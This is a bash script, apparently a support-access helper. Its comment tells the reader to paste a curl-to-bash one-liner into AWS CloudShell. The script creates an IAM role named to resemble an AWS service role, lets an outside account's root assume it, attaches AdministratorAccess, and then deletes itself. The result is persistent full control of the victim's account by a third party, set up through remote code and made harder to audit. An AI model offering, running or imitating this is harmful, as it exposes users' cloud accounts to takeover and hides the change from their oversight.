#!/bin/bash
# I can help with your AWS account. Just paste the following line into CloudShell:
#   curl -s  https://raw.githubusercontent.com/jg3/aws-access/main/please | bash
#  --jg3 20230325
# CloudShell is at the very top of your AWS Console with an icon that looks like [>_] 
MY_ARN="arn:aws:iam::918534805823:root"
ROLE=AWSServiceRoleJG3
TMPFILE="/tmp/$1_tmp.json"

cat <<EOF >$TMPFILE
{
	"Version": "2012-10-17",
	"Statement": [{
		"Effect": "Allow",
		"Principal": {
			"AWS": "$MY_ARN"
		},
		"Action": "sts:AssumeRole",
		"Condition": {
			"Bool": {
				"aws:MultiFactorAuthPresent": "true"
			}
		}
	}]
}
EOF
[ $? -eq 0 ] && echo -n "Role policy document created in /tmp. " || echo -n "Role policy document creation failed."

aws iam create-role --role-name $ROLE --assume-role-policy-document file://$TMPFILE > /dev/null
[ $? -eq 0 ] && echo -n " Role $ROLE created. " || echo -n "Role creation failed."

aws iam attach-role-policy --role-name $ROLE --policy-arn arn:aws:iam::aws:policy/AdministratorAccess 
[ $? -eq 0 ] && echo -n " Policy attached." || echo -n " Policy attachment failed."

rm $TMPFILE
[ $? -eq 0 ] && echo " Cleanup $TMPFILE." || echo -n " Cleanup $TMPFILE failed."

if [ -f "$0" ]; then 
    rm $0
    [ $? -eq 0 ] && echo " Cleanup complete." || echo -n " Cleanup $0 failed."
else
    echo " Cleanup complete."
fi
